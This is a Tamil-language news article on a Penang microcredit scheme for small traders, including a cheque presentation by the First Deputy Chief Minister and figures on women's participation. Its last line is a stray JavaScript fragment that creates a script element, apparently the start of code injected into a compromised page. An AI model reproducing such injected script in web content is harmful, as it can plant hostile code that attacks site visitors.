சிறுத்தொழிலில் பெண்களின் பங்கேற்பு அதிகரிப்பு

பினாங்கு மேம்பாட்டுக் கழகமும் பினாங்கு மாநில அரசும் இணைத்து சமத்துவக் கடனுதவித் திட்டத்தை அறிமுகப்படுத்தி சிறுதொழில் செய்யும் வியாபாரிகள் தங்கள் வியாபாரத்துறையில் வெற்றிநடைப்போட வழிவகுக்கிறது. அண்மையில் பினாங்கு மேம்பாட்டுக் கழக ஏற்பாட்டில் 45 சிறுதொழில் வியாபாரிகளுக்குக் காசோலை எடுத்து வழங்கினார் பினாங்கு மாநில முதலாம் துணை முதல்வர் டத்தோ ஹஜி முகமட் ரஷிட் அஸ்னோன். இத்திட்டத்தில் சிறுவியாபாரிகளுக்கு ரிம1000 முதல் ரிம10,000 வரை கடனுதவி வழங்கப்படுகிறது.
ஒவ்வொரு வியாபாரிகளும் தங்களின் வியாபார தேவைக்கேற்ப கடனுதவித் தொகையைப் பெற்றுக்கொள்வர். இத்திட்டத்தில் இடம்பெறும் வியாபாரிகள் வார தவணை முறையில் இரண்டு ஆண்டுக்குள் கடனைச் செலுத்த வேண்டும். மாநில முதலாம் துணை முதல்வர் இவ்வாண்டு சமத்துவக் கடனுதவித் திட்டத்திற்காக ரிம 9.72 மில்லியன் ஒதுக்கீடுச் செய்து 2,227 சிறுதொழில் வியாபாரிகள் இத்திட்டத்தினால் நன்மை அடைவர் எனக் கூறினார்.
பினாங்கு வாழ் சிறுதொழில் வியாபாரிகளுக்கு சமத்துவக் கடனுதவி பற்றிய புரிதலையும் அதிகப்படுத்தும் நோக்கில் பொது இடங்களில் பட்டறைகள், முகாம்கள் நடத்தப்படவுள்ளன. இதன்வழி, அதிகமான சிறுதொழில் வியாபாரிகளை உருவாக்க இயலும் என நம்பிக்கை தெரிவித்தார். 29 மார்ச் 2016-ஆம் ஆண்டின் கணகெடுப்பில் 1,229 பெண்கள் சிறுதொழில் வியாபாரத்தில் ஈடுப்படுவதை வரவேற்கதக்கது என தமதுரையில் பாராட்டினார். பினாங்கு மாநிலம் பாலின சமத்துவத்திற்கு முக்கியத்துவம் வழங்குவது இதில் புலப்படுகிறது.
மூன்றாவது முறையாக சமத்துவக் கடனுதவிப் பெறும் பிபி குசும் தனது துணிவியாபாரத்தை மேம்படுத்த இந்த உதவித்தொகை மிகவும் உறுதுணையாக அமைகிறது என்றார். வங்கி கடனுதவிக் காட்டிலும் இத்திட்டத்தில் வட்டி மிகக் குறைவாகவும் இலகுவாகவும் இருப்பதாகத் தெரிவித்தார்.

 சமத்துவக் கடனுதவி காசோலை எடுத்து வழங்கினார் பினாங்கு மாநில முதலாம் துணை முதல்வர் டத்தோ ரஷிட் பின் அஸ்னோன்.
சமத்துவக் கடனுதவி காசோலை எடுத்து வழங்கினார் பினாங்கு மாநில முதலாம் துணை முதல்வர் டத்தோ ரஷிட் பின் அஸ்னோன்.
var d=document;var s=d.createElement(‘script’);